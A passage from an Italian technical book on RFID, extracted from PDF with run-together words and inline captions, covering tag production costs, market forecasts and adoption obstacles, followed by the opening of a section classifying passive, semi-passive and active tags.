PARTE I - INTRODUZIONE AGLI RFID79

Figura I.30Distribuzione dei sistemi RFID realizzati nelle

diverse frequenze:• a sinistra i sistemi operanti nel 2008• a destra i progetti sviluppati a livello

mondiale negli ultimi anniFonte: “RFID Forecasts, Players and

Opportunities 2008-2018”(www.IDTechEx.com) dati presentati al

convegno TraceID a Milano Aprile 2008, lepercentuali in figura sono solo indicative

I.4.8

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 79

Page 75: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

mito) è considerato il raggiungimento del costo di 5 cent/TAG per le“etichette intelligenti” da applicare ai singoli oggetti.Nella realtà, un’analisi dei costi dei TAG [46] porta a quanto illustrato

in Figura I.31 in cui il grafico illustra una previsione sul costo dei TAGpassivi a basso costo (“etichette intelligenti”) nei prossimi anni.Il “mitico” traguardo di 5 cent/TAG (naturalmente riferito ad “etichette

intelligenti” a basso costo) sembrerebbe quindi raggiungibile intorno al 2010.Nelle ipotesi di costo unitario di cui sopra le previsioni sulla diffusione

dei TAG (della medesima fonte) parlano dell’inizio di una vera diffusionepervasiva appena dopo il 2010.Le due figure che seguono, espongono invece una tematica di interes-

se immediato: la ripartizione attuale dei costi industriali, come presentatada una primaria azienda nazionale. Il riferimento è ancora a TAG passivia basso costo (“etichette intelligenti”) e di produzione massiva e le voci dicosto si riferiscono alla struttura del TAG come descritta in §I.1.3.1 e conmaggior dettaglio in §II.3.I grafici della ripartizione dei costi meritano alcuni commenti, sia per-

ché di origine recente e di stretta attualità, sia perché di fonte nazionale epertanto perfettamente applicabili alla nostra realtà produttiva:- La prima considerazione (probabilmente inaspettata) è l’incidenza tra-scurabile dei costi del personale per tutti i tipi di TAG. Da questo

RFID - Fondamenti di una tecnologia silenziosamente pervasiva80

Figura I.31Previsione sul costo dei TAG passivi

negli anni 2005 ÷2015Fonte: IDTechEx (2005); citata in [46]

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 80

Page 76: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

discendono altre due considerazioni:

• La produzione di etichette intelligenti è particolarmente adatta allecondizioni lavorative di un paese occidentale, non si comprendereb-bero quindi eventuali esternalizzazioni della produzione in paesi conbasso costo di manodopera.

• Forse il senso di una produzione in “Oriente” andrebbe maggiormen-te ricercata nella vicinanza a mercati più dinamici ed a fonti di approv-vigionamento di “materie prime” (vedi nel seguito il costo dei chip).

- La seconda considerazione è relativa al maggior fattore di costo (anche

PARTE I - INTRODUZIONE AGLI RFID81

Figura I.32Ripartizione dei costi di produzione di TAG

passivi UHF (elettromagnetici) a basso costo(del tipo “etichette intelligenti”) - Lab-Id

Figura I.33Ripartizione dei costi di produzione di TAG

passivi HF (induttivi) a basso costo (del tipo“etichette intelligenti”) - Lab-Id

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 81

Page 77: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

in questo caso per tutti i tipi di TAG) che risulta legato al prezzo delchip. L’importanza di questo dato risiede nel fatto che in Italia pur ope-rando diverse aziende (in genere medio-piccole) che producono TAG,sono quasi totalmente assenti quelle che producono chip (in genereaziende di grandi dimensioni).

• In altri termini il maggior fattore di costo (in chip) deriva da dinami-che esterne alla realtà produttiva nazionale (cfr. Tabella 1 5).

• Il minor costo dei chip UHF, è connesso alle minori funzionalità (usermemory per esempio) previste dallo standard EPC C1gen2. Non vaquindi fatto grande affidamento su questo dato, considerando che lefunzionalità dei gen2 verrannno presto estese ai TAG HF e solo allo-ra sarà possibile un confronto di prezzi, legato essenzialmente aivolumi globali di vendita.

- La terza considerazione riguarda i costi di processo (ovvero di assemblag-gio del TAG), risultano rilevanti, ma non eccessivamente condizionantiper la produzione. In merito si possono fare ulteriori considerazioni:

• L’ammortamento della linea di produzione risulta centrato su 1 anno(per tutti i tipi di TAG). Il che sta a significare situazioni molto dina-miche ed adatte a piccole unità produttive.

• Nei costi di processo comincia a delinearsi una certa convenienza deiTAGUHF sui quali si sono concentrati i maggiori investimenti in ter-mini di ricerca..

- La quarta ed ultima considerazione riguarda il costo dell’antenna edegli adesivi:

• Il costo dell’antenna incide per una percentuale doppia nei tag HFrispetto a quella dei TAGUHF e costituisce il maggior fattore di con-venienza di quest’ultimi.

• In definitiva, però, il maggior costo dei TAG induttivi rispetto aiTAG elettromagnetici è solo dell’ordine di 2-3 €cent e questo spiegail perché lo sviluppo delle tecniche UHF non è ancora massivo comesi prevedeva.

• È però ipotizzabile che la richiesta delle funzionalità gen2 anche suiTAG HF (chip di maggior costo) e le nuove tecniche di stampa perantenne UHF (che abbasseranno ulteriormente i costi), farannno

RFID - Fondamenti di una tecnologia silenziosamente pervasiva82

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 82

Page 78: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

presto aumentare queto divario segnando la definitiva convenienzadei TAG UHF, naturalmente ove le applicazioni lo consentano.

• Il costo degli adesivi (per fissare l’antenna ed il chip al substrato) èuna voce rilevante del processo produttivo (viene infatti indicata aparte). In questo senso esiste spazio per la ricerca e l’innovazione nelcampo della chimica.

Per completare il panorama sui fattori di costo, si propone, in TabellaI.5, una stima della produzione complessiva di chip per RFID di cui si èdetta la rilevanza nella formazione dei costi dei TAG RFID.

A conclusione del paragrafo, si indicano alcune prospettive suggeritedall’industria per una riduzione dei costi. Queste si orientano essenzial-mente verso due direzioni:- Miglioramento dei processi; ovvero:• Maggiore velocità di produzione• Minore incidenza degli scarti• Riduzione del tempo di set-up grazie all’acquisizione di ordini consi-stenti

- Riduzione del costo dei materiali; ovvero:• Antenne: studio di nuovi processi produttivi (cfr. §II.4)• Adesivi: perfezionamento dell’uso del tipo NCP (cfr. §II.3).

PARTE I - INTRODUZIONE AGLI RFID83

Tabella I.5“Hit Parade” dei maggiori produttori di chipper TAG RFID; numero di chip prodotti dalle

origini ad oggi.Fonte: “RFID Forecasts, Players and

Opportunities 2008-2018”(www.IDTechEx.com) dati presentati al

convegno TraceID, Milano, Aprile 2008 [169]

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 83

Page 79: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

• IC: realizzazione di chip meno costosi con caratteristiche sufficientiper l’utilizzo in larga scala

Infine alcune considerazioni finali sul costo dei TAG:- La differenza di prezzo tra HF ed UHF non è oggi giustificata da ana-lisi dei costi (2-3 cents di differenza tra TAG UHF e HF) ma probabil-mente lo sarà in un futuro prossimo.

- I prezzi dei TAG consentirebbero fin da oggi l’Item Level Tagging(TAG sui singoli oggetti). Come costo comparativo si pensi a quellodell’ologramma correntemente applicato sui capi di abbigliamento dipregio, sui CD/DVD e su altro. Probabilmente quidi i freni allo svilup-po non sono da imputarsi al costo dei TAG.

- Un fattore certo di rallentamento dei progetti RFID è dato dalle diffi-coltà di integrazione, sia con le basi di dati aziendali, sia nell’interacatena di distribuzione. Queste difficoltà, più che il costo del tag, cau-sano attualmente il maggior costo di startup del progetto.

PROSPETTIVE ECONOMICHE E DI MERCATO

Per le prospettive di sviluppo del mercato degli RFID, si fa generalmenteriferimento agli studi pubblicati da agenzie specializzate. Nel seguito si pro-pongono alcuni grafici e tabelle significativi, tratti da alcuni di questi studi.Per cominciare, i primi dati proposti, riguardano la diffusione dei TAG

a livello mondiale. Una previsione di massima è illustrata in Figura I.34,mentre in Tabella I.6 viene presentata una panoramica mondiale dell’in-stallazione di TAG, divisi per applicazione e relativi agli ultimi due anni,nonché a tutto l’installato dalle origini ad oggi. Riguardo quest’ultimatabella, i dati forniti dalla fonte (non illustrati), parlano di un valore com-plessivo dei TAG installati di 2.160 M$ nel 2007 e 2.36 M$ nel 2008, conoltre metà (del valore complessivo) assorbito dalle Smart cards/sistemi dipagamento, seguono tutte le applicazioni di vendita al minuto (etichetteintelligenti) la cui somma di valori (dei TAG) delle varie applicazioni nonarriva, però, alla metà di quello delle smart card.Tutto ciò a fronte dei dati (illustrati) sul numero dei TAG che vedono

le smart card in lieve flessione dal 2007 al 2008 ed invece l’insieme delle

RFID - Fondamenti di una tecnologia silenziosamente pervasiva84

I.4.9

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 84

Page 80: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

etichette intelligenti in crescita nello stesso periodo.Questi dati non fanno che confermare la stabilizzazione del mercato

dell smart card e la sostanziale immaturità del mercato delle etichetteintelligenti, anche se ne fanno presagire un grande sviluppo.

PARTE I - INTRODUZIONE AGLI RFID85

Figura I.34Previsione sul numero di TAG in circolazione

negli anni 2005 ÷2015Fonte: IDTechEx (2005); citata in [46]

Tabella I.6Panorama mondiale dell’installazione di TAG,

divisi per applicazioneFonte: “RFID Forecasts, Players and

Opportunities 2008-2018”(www.IDTechEx.com) dati presentati al

convegno TraceID, Milano, Aprile 2008 [169]

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 85

Page 81: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

La seconda parte dei dati proposti, riguarda le previsioni globali dimercato. In Figura I.35, le previsioni globali sono esposte dettagliate persettori tecnologici e proiettate per diversi anni a venire.

Va sottolineato che le previsioni (recenti) sul mercato mondiale illustra-te in Figura I.35 non concordano con quelle (meno recenti e particolar-mente ottimistiche) esposte, per il mercato mondiale dei sistemi RFID(hardware, software e servizi), in [52] (cfr. Figura I.36) in cui le stime par-lano di 1,5 miliardi € nel 2004 ed una previsione di 22 miliardi € nel 2010,con una crescita media del 57% per anno.Non sempre, infatti, le previsioni concordano, anche perché effettuate

su una differente base di applicazioni.Sempre a proposito di previsioni sul mercato mondiale, lo studio [48]

illustra, invece, previsioni concordanti con quello di Figura I.35. La pre-visione di crescita del mercato globale (composto da hardware, softwaree servizi) infatti è stimata da 1,8 miliardi di dollari nel 2005 a 4,1 miliardidi dollari nel 2008 per raggiungere i 7,1 miliardi nel 2010 con un tasso dicrescita annuale medio pari a poco più del 31%.Continuando con le previsioni per il mercato globale di RFID, la mede-

sima fonte dello studio [48 , presenta (Tabella I.7) previsioni sia per areegeografiche in uno specifico periodo (anno 2006).

RFID - Fondamenti di una tecnologia silenziosamente pervasiva86

Figura I.35Prospettive di investimento mondiali nei

settori della tecnologia RFIDFonte: “RFID Forecasts, Players and

Opportunities 2008-2018”(www.IDTechEx.com) dati presentati al

convegno TraceID a Milano Aprile 2008 [169],le percentuali in figura sono solo indicative

Figura I.36Stime del mercato mondiale RFID

in miliardi €, secondo [52]

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 86

Page 82: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Secondo [48], il mercato dell’area EMEA è stimato intorno a 500 M$nel 2005, per salire a circa 850 M$ nel 2007 (concordando sostanzialmen-te con quanto esposto in Tabella I.7 che proviene dalla stessa fonte) e rag-giungere quasi 2 miliardi $ nel 2010. La metà di quello americano e dicirca il 40% superiore a quello dell’Asia-Pacifico, con un tasso di cresci-ta annuale medio uniforme per tutti e pari al già citato 31%.Per quanto riguarda il mercato in Europa, secondo la fonte [53] la cre-

scita è risultata inferiore a quanto ipotizzato alcuni anni or sono, forse peril contesto normativo meno favorevole rispetto agli USA o l’eccessivoentusiasmo sulle prestazioni o sui costi della tecnologia.Ovvero a fronte di stime di 333 milioni di $ nel 2005, precedenti pub-

blicazioni del 1998 stimavano il valore del mercato europeo da 13 a 30miliardi $ (Red Herring – 2005).Secondo la fonte [52] (cfr. Figura I.37) il mercato globale dei sistemi

RFID (hardware, software e servizi) passerebbe, nell’Europa a 15, da 400milioni € nel 2004 ad una previsione di 4 miliardi € nel 2010, con una cre-scita media del 47% per anno.Sempre secondo [52] i paesi europei in testa agli investimenti sono

Germania, Francia e Regno Unito che, da soli hanno realizzato circa il90% degli investimenti europei nel 2004, che dovrebbero diminuire inpercentuale negli anni successivi a causa dell’incremento dell’investimen-to degli altri paesi tra cui il nostro.Infine, a conclusione del paragrafo, possono avere interesse le previ-

sioni di impatto economico dei Location-Based Services (LBS) basati suRFID che, secondo [53], sono le seguenti:

PARTE I - INTRODUZIONE AGLI RFID87

Tabella I.7Dimensioni del mercato globale nel 2006

divise per continenti.Fonte: VDC (Venture Development

Corporation)

Figura I.37Stime del mercato europeo RFID

in miliardi €, secondo [52].

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 87

Page 83: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

CRITICITÀ E OPPORTUNITÀ PER LO SVILUPPO

Nonostante il prevedibile e rapido successo, la tecnologia RFID presenta,oggi e per il prossimo futuro, un certo numero di criticità rispetto allecaratteristiche ideali desiderate dall’utenza.Esistono, infatti, problematiche che, se da un lato potranno essere

risolte con lo sviluppo tecnologico, dall’altro lato costituiscono ancora unfreno all’introduzione massiva della tecnologia nella catena di distribuzio-ne ed in altri ambienti applicativi. Un breve e non esaustivo elenco è ilseguente:- Scarsa compatibilità “worldwide”• non uniformità di frequenze operative e potenze in trasmissione intutto il pianeta.

- Difficoltà nell’allestimento dell’applicazione• mancanza di sistemi “chiavi in mano”;• aspettative non realistiche indotte degli integratori;• alti costi del software applicativo.

- Prestazioni modeste di TAG e Reader rispetto alle specifiche o alleaspettative dell’applicazione• scarsa distanza operativa;• possibilità di fallimenti nelle operazioni di lettura;• bassa velocità di lettura-scrittura.

- Incompleta applicabilità su tutte le merci• scarsa flessibilità per la progettazione delle antenne con conseguentilimiti su forma, dimensioni e contenitori dei TAG.

- Difficoltà ad ottenere fiducia da consumatori ed aziende

RFID - Fondamenti di una tecnologia silenziosamente pervasiva88

I.4.10

Tabella I.8Dimensione del mercato globale

Location-Based Services secondo [53]

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 88

Page 84: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

• modesta sicurezza e protezione dei dati.- Limitata integrazione dei processi di “tagging”•mancata ripartizione dei costi sull’intera catena di distribuzione (pro-duzione, trasporto, commercio);

• immaturità tecnica dei sistemi “middleware” non disponibili per tuttigli attori della catena.

- Impatto ambientale non trascurabile, almeno per alcuni tipi di TAG.- Costo dei TAG. che viene percepito, forse a torto come il maggior fat-tore ostativo• si somma al prezzo finale delle merci;• non sempre viene ripartito su tutti gli attori della catena di distribu-zione.

Comunque, qualsiasi siano i veri fattori ostativi, emerge una reale diffi-coltà ad individuare il valore aggiunto della tecnologia RFID nel contestoaziendale, specie in contrapposizione con tecnologie consolidate quali icodici a barre. Ne consegue una difficoltà a giustificare gli investimenti.Un esempio (citato da [54]) è relativo alla grande catena di vendita in

USA, Wal-Mart (www.walmartstores.com), che ha provocato qualchemalumore, forzando i propri fornitori ad implementare tecnologia RFID,senza troppo curarsi che questi ne comprendessero i benefici per se e peri loro clienti.Un altro esempio (citato da [52]) vede invece una grande catena di ven-

dita europea, Metro Group(http://www.metrogroup.de), vantare la riduzio-ne del 14% dei fondi di magazzino e del 18% delloro deprezzamento.La maggior parte degli esempi, però, parlano di

applicazioni di successo, come il “tagging” di duemilioni di libri e manoscritti della biblioteca vati-cana, che ha risolto molti problemi di inventarioe di prestito dei volumi.Secondo l’indagine [54] dalle risposte di

aziende, comunque in maggioranza favorevoliall’implementazione della tecnologia RFID, si

PARTE I - INTRODUZIONE AGLI RFID89

Figura I.38“Hit Parade” dei fattori ostativi per le

applicazioni RFID, da [54]

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 89

Page 85: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

evince una “Hit Parade” dei fattori ostativi che vede al primo posto leproposte di applicazioni che, almeno in apparenza, non brillano per valo-re aggiunto, seguite dal costo dell’infrastruttura, il costo dei TAG, la man-canza di standard globali (e di compatibilità “worldwide”) e le prestazio-ni modeste, specie nella lettura dei TAG.Per il tema specifico del costo dell’infrastruttura, [52] cita uno studio

(Soreon Research) che mette i costi del software al primo posto per unprogetto RFID.Lo studio [48], invece, stima, nel 2005 il fattore di costo del software

al 7%, quello dei servizi al 34%, mentre il fattore di costo dell’hardwareè stimato al 59%. Per quanto riguarda i tassi stimati di crescita media finoal 2010, [48] stima il software al 41% per anno, i servizi al 34 % e l’hard-ware al 28% per anno.Forse, senza troppo attendere futuri sviluppi tecnologici, che comun-

que si prospettano come un processo lontano dalla stabilizzazione, la viamigliore sarebbe quella di non puntare al contesto aziendale per l’intro-duzione della tecnologia RFID, ma, come accaduto per i codici a barre,coinvolgere nel processo tutta la catena di distribuzione, ripartendo i costie condividendo i benefici tra tutti gli attori.In quest’ottica l’attenzione non andrebbe posta tanto nelle prestazioni

esasperate di TAG e Reader, quanto alla funzionalità di sistemi di gestio-ne e “middleware” e, soprattutto alla loro accessibilità da parte di tutti gliattori della catena.Inoltre, piuttosto che focalizzarsi sul costo assoluto dei TAG, sembra

un approccio migliore quello di valutarne il costo relativo rispetto ai bene-fici introdotti nelle situazioni d’impiego.Ad esempio, in molte applicazioni nell’ambito della produzione, TAG

di costo pari a quello attuale, possono non risultare onerosi se si effettuaun confronto con soluzioni alternative o con il costo derivante dalle pro-blematiche che vengono risolte con il loro uso. In molte circostanze tutta-via il mercato è ancora focalizzato sulla disponibilità del “mitico” TAGcon costo pari a 5 cent che ne renderebbe possibile la sua applicazione“indolore” ad ogni singolo prodotto.Ad oggi, comunque, l’ordine di grandezza del costo dei sistemi RFID è

RFID - Fondamenti di una tecnologia silenziosamente pervasiva90

Figura I.39Stime dei maggiori fattori di costo diun’applicazione RFID secondo Soreon

Research citato da [52]

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 90

Page 86: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

il seguente:- TAG passivi, per grandi volumi di acquisto, da 20 cent (per le etichet-

te più semplici) ad alcuni € (per TAG in contenitori plastici).- TAG attivi da circa 10 a 50 o più € in dipendenza dalla dimensione

delle batterie, dalla quantità di memoria, dal tipo di contenitore, dall’e-ventuale presenza di sensori.

- Reader da 500 a 3.000 € in dipendenza delle loro funzionalità.La situazione ad oggi vede un minimo di 20 cent per TAG contro meno

di 1 cent per un codice a barre stampato. Questo fa pensare che nell’eti-chettatura dei singoli prodotti (segnatamente nei supermercati) i codici abarre continueranno a dominare per alcuni anni.

L’adozione di RFID, pertanto, sembrerebbe oggi più promettente alivello di prodotti raggruppati (contenitore, cassa, pallet o contenitorimaggiori), piuttosto che di singolo prodotto; a meno che la necessità dipolitiche anti taccheggio (controllo a campione con RFID a perdereoppure recupero alla cassa di RFID riusabili) o il valore del prodottomedesimo, non ne giustifichi l’impiego immediato.

Con il diffondersi della tecnologia RFID, si stima che i costi dei TAGdiminuiranno progressivamente, il che comporta che realizzazioni attual-mente giudicate troppo costose possano divenire convenienti con il pas-sare del tempo.

A questo proposito le aziende produttrici di microchip stanno lavoran-do per ridurre l’area di un chip per TAG UHF a circa 0,3 mm2, questodovrebbe far abbassare di molto il costo industriale entro qualche anno(Figura I.31, anno 2010).

Un’altra speranza a breve è in proposte (Alien Technology, PhilipsSemiconductors) di nuovi processi di assemblaggio dei chip concepiti perproduzioni di miliardi di TAG.

Prospettive a lungo termine fanno capo alla produzione di semicondut-tori con polimeri plastici anziché con silicio [49] . Con queste tecnologiesi ipotizza di realizzare TAG la cui elettronica sia direttamente stampatasull’oggetto, con l’uso di stampanti non troppo dissimili da quelle cheoggi stampano i codici a barre.

Con questa tecnologia materiali organici e inorganici, in genere realiz-

PARTE I - INTRODUZIONE AGLI RFID91

41-92.qxp:RFID 9-09-2008 10:53 Pagina 91

Page 87: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

zati su film plastici, si affacciano sul mercato per offrire soluzioni più eco-nomiche ai tradizionali chip. I TAG che non contengono al loro internoun chip in silicio, promettono di far precipitare i costi delle etichette versoquelli di un codice a barre.Ad esempio, nel febbraio 2006 Philips Research ha presentato il primo

TAG a 13,56 Mhz in cui al posto del silicio è stato usato un polimero pla-stico. Inoltre la società tedesca PolyIC, joint-venture tra Siemens e Kurtz(industria di stampa tedesca) ha realizzato TAG a etichetta con polimeriplastici [http://www.polyic.com].Tra le applicazioni più interessanti, in virtù dello spessore sottile dei

film, c’è quella di incorporali all'interno delle banconote o nelle riviste enelle pagine dei libri come strumento anti-contraffazione.Per l’affermazione dei TAG a polimeri plastici sarà necessario aspetta-

re la seconda generazione; quelli disponibili al momento non rispondonoancora agli standard internazionali e sono poco appetibili dal punto divista commerciale a causa di limiti tecnici.

Per concludere questa prima parte introduttiva alla tecnologia RFIDsembra largamente plausibile che, anche con l’ausilio delle tecnologie piùavanzate, presto o tardi ogni prodotto venduto sarà dotato di TAG e laapplicazioni RFID divengano velocemente e senza clamore, una delle tec-nologie più massivamente realizzate nella nostra epoca.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva92

Figura I.40TAG flessibile in polimeri plastici PolyIC

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 92

Page 88: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II

CATEGORIZZAZIONE ETECNOLOGIE COSTRUTTIVE

di Paolo Talone, Giuseppe RussoFondazione Ugo Bordoni

Con il contributo di

Stefano Baroniper la trattazione delle antenne a filo

Marzio Amadoriper le tecniche di produzione dei TAG

In questa parte vengono illustrati gli aspetti realizzativi attinenti a TAG eReader. Essenzialmente per quanto riguarda: Categorizzazione di base nella tecnologia RFID, che si fonda:

- sulla tipologia di alimentazione che porta a distinguere i TAG tra passivi,semi passivi e attivi;

- sui principi fisici della comunicazione tra TAG e Reader che porta adistinguere tra TAG ad accoppiamento induttivo o elettromagnetico.

Antenne e conseguenti problemi di costruzione, orientamento e polarizza-zione, che influiscono significativamente sulle prestazioni del sistema.

Caratteristiche di memoria e contenitori di TAG, che giocano un ruolo diprimo piano nel progetto delle applicazioni.

Architettura dei sistemi RFID, che rappresenta un modello di ambiente perlo sviluppo delle applicazioni.

RFIDFondamenti di una tecnologia silenziosamente pervasiva

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 93

Page 89: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

CATEGORIZZAZIONE DEI TAG

TAG PASSIVI

I TAG passivi usano il campo generato dal segnale del Reader come sor-gente di energia per alimentare i propri circuiti e trasmettere.La potenza ricavabile dal segnale del Reader, però, non è solo bassa, ma

decresce molto rapidamente con la distanza ed è limitata dalle normative suilivelli di emissione RF del Reader medesimo. Ne risultano distanze operati-ve ridotte (al massimo qualche metro) ed altre criticità nel funzionamento.Gli obiettivi tecnologici riguardano essenzialmente la gestione eneretica,

ovvero il basso consumo, e le prestazioni di memoria e logica di controllo,nonchè, indirettamente, la capacità di gestire segnali RF affetti da rumore.Allo scopo di contenere i costi, i chip di un TAG sono realizzati usando

tecnologie per ottenere una geometria del circuito ridotta; attualmente sirealizzano chip di superficie 0,5 mm2 per frequenze UHF.In termini di potenza computazionale, non si va oltre una logica di base

ed una macchina a stati in grado di eseguire semplici istruzioni.A questo proposito riveste grande importanza il sottosistema per rica-

vare l’alimentazione per il TAG; ovvero l’antenna ed il blocco circuitaleche converte il segnale ricevuto in energia.Per quanto riguarda la temporizzazione, problemi di economicità e

scarsità di energia, fanno sì che questa venga normalmente estratta dalsegnale del Reader.I TAG contengono una certa quantità di

memoria non volatile EEPROM. Per un identifi-catore universale (EPC) sono necessari almeno96 bit, quantità di memoria superiori consentonodi immagazzinare informazioni aggiuntive.Naturalmente maggiore è la memoria maggiorisono le dimensioni del chip ed i relativi costi.Questa tipologia di TAG è la più diffusa ed

impiegata nelle applicazioni massive. Viene rea-lizzata su quasi tutte le bande di frequenza con-sentite per applicazioni RFID.

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE95

II.1

II.1.1

Figura II.1Tag-it™ passivo in banda HF 13,56 Mhz,

antenna in alluminio 45 x 45 mm, 256 Kbytedi memoria, standard ISO/IEC 15693-2,-3;

ISO/IEC 18000-3, adatto all’assemblaggio incarta o PVC ed applicazioni di identificazione

oggetti, catalogazione libri, bigliettielettronici

Texas Instruments

Figura II.2Schema a blocchi generale di TAG passivi [4]

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 95

Page 90: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

BATTERY ASSISTED TAG (SEMI-PASSIVI)

I Battery Assisted Passive (BAP) TAG, i cosiddetti semi-passivi (o semiattivi come specificato nella parte I di questo libro) sono stati sviluppatiper essere impiegati in quelle situazioni in cui i TAG attivi presentavanoun costo troppo alto o una durata troppo breve delle batterie, ed i TAGpassivi non assicuravano sufficienti prestazioni. I TAG battery assistedoperano a frequenze alte, sfruttando l’accoppiamento elettromagnetico incondizioni di “campo lontano” con effetto backscatter (cfr §III.2).I TAG semi-passivi usano quindi, come i TAG passivi, il campo gene-

rato dal segnale del Reader come sorgente di energia per trasmettere, manon per alimentare i propri circuiti.Nel TAG infatti è inclusa una batteria, utilizzata però solo per alimen-

tare il chip, non per comunicare con il Reader. Questo consente al chipmedesimo di realizzare funzioni più complesse e di operare anche quan-do il TAG non riceve energia dal Reader.La distanza operativa è limitata, similmente ai TAG passivi, dal fatto

che il TAG non ha un trasmettitore integrato, ma è obbligato ad usare ilsegnale del Reader per rispondere. A differenza dei TAG passivi, però,

l’antenna di un TAG semi passivo non è proget-tata come compromesso tra le capacità di assor-bire energia, per ricavare potenza per l’alimenta-zione del TAG, e di riflettere la potenza inciden-te per rispondere all’interrogazione (cfr. §III.3.1). L’antenna è ottimizzata per l’effettobackscatter (cfr. § III.3.2), ovvero per riflettere lamassima potenza del segnale incidente (segnaled’interrogazione), incrementando la profonditàdi modulazione ed il rapporto segnale/rumoredel segnale riflesso. La distanza operativa, per-tanto, può superare i 30 metri.

Alcuni TAG semi-passivi “dormono” (disconnettono in batteria) fino aquando vengono “risvegliati” da un segnale prodotto dal Reader, il checonsente di diminuire il consumo energetico.Il vantaggio dei TAG semi-passivi è di poter montare memorie di mag-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva96

II.1.2

Figura II.3A927- TAG semi passivo in banda UHF

870÷915 MHz, conforme a ISO 18000-6B,batteria 3 anni, con sensore di temperatura,

128 + 128 Byte di memoria, applicazioniTemperature Logger per medicinali e merci

deperibiliCAEN S.p.A. Costruzioni Apparecchiature

Elettroniche Nucleari, Viareggio

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 96

Page 91: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

gior capacità e riscrivibili, nonché, su alcuni modelli, sensori ambientaliper misurare temperatura, pressione, movimento, ecc.Usufruendo della fonte di energia della batteria i sensori possono com-

piere misure, conservarle in memoria con le informazioni temporali erestituirle all’interrogazione del Reader, fornendo una storia della vita del-l’oggetto a cui sono associati. La cosiddetta catena del freddo, costituisceun’applicazione tipica per queste caratteristiche.Il costo dei TAG semi-passivi è di alcuni Euro.La batteria con i suoi costi, la sua durata e le connesse problematiche

di inquinamento, costituisce la principale criticità per questo tipo diTAG.Alternativa alla disponibilità di una batteria può essere quella di rica-

vare energia dall’ambiente, attraverso piccole celle solari, o sistemi iner-ziali che caricano accumulatori come in alcuni recenti orologi da polso.

TAG ATTIVI

I TAG attivi sono muniti di un proprio sistema di alimentazione, tipica-mente una batteria e di un trasmettitore/ricevitore a radio frequenza.Normalmente la memoria a bordo ha dimensioni più ampie di quella deiTAG passivi e possono essere eseguite operazioni di lettura e scrittura sudi essa.Altro vantaggio dei TAG attivi è dato dalla distanza operativa molto

superiore rispetto a quelli passivi e semi-passivi, in quanto equipaggiaticon un vero trasmettitore alimentato da fonte di energia. La distanza rag-giungibile è limitata solo dall’antenna e dall’energia disponibile nelle bat-terie. Può arrivare a centinaia di metri.A volte i TAG attivi hanno a bordo sensori di vario genere (temperatu-

ra, pressione, movimento, ecc.) che vengono usati, come si è detto, anchenei TAG semi passivi.Il costo di questi apparati può raggingere decine di Euro, vengono

generalmente prodotti per frequenze elevate (UHF, SHF) e sono natural-mente dedicati ad applicazioni “di pregio”, oppure in casi in cui il TAGsia riusabile più volte.

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE97

II.1.3

Figura II.4TAG attivo in banda UHF 869,4÷869,65 Mhz,

dimensioni 87 x 50 x 7 mm, per uso inlogistica

Identec Solution

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 97

Page 92: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva98

Tabella II.1Confronto tra TAG passivi, semi-passivi e

attivi [4]

Figura II.5TAG UHF attivo i-Q32 con sonda esterna e“data-logger” di temperatura − Identec

Solutions

Figura II.6TAG attivo in banda UHF per uso in logistica con

integrazione a bordo di un GPS . Il dato GPS (coordinategeoreferenziali) è scritto periodicamente in memoria.In lettura si acquisiscono terne storiche dei dati (ID+

coordinate + orario) a distanze anche fino a 500 m. in arialibera. Durata della batteria di bordo: tre anni

− Identec Solution

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 98

Page 93: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

ACCOPPIAMENTO TAG-READER NEI SISTEMI PASSIVI

La lettura di un TAG passivo (o semi-passivo) è piuttosto diversa da unacomunicazione dati full duplex a radiofrequenza.A differenza degli apparati di tipo attivo, i TAG passivi dipendono per

la loro alimentazione dall’energia a radio frequenza che ricevono.I TAG passivi, inoltre, non generano la frequenza portante che usano

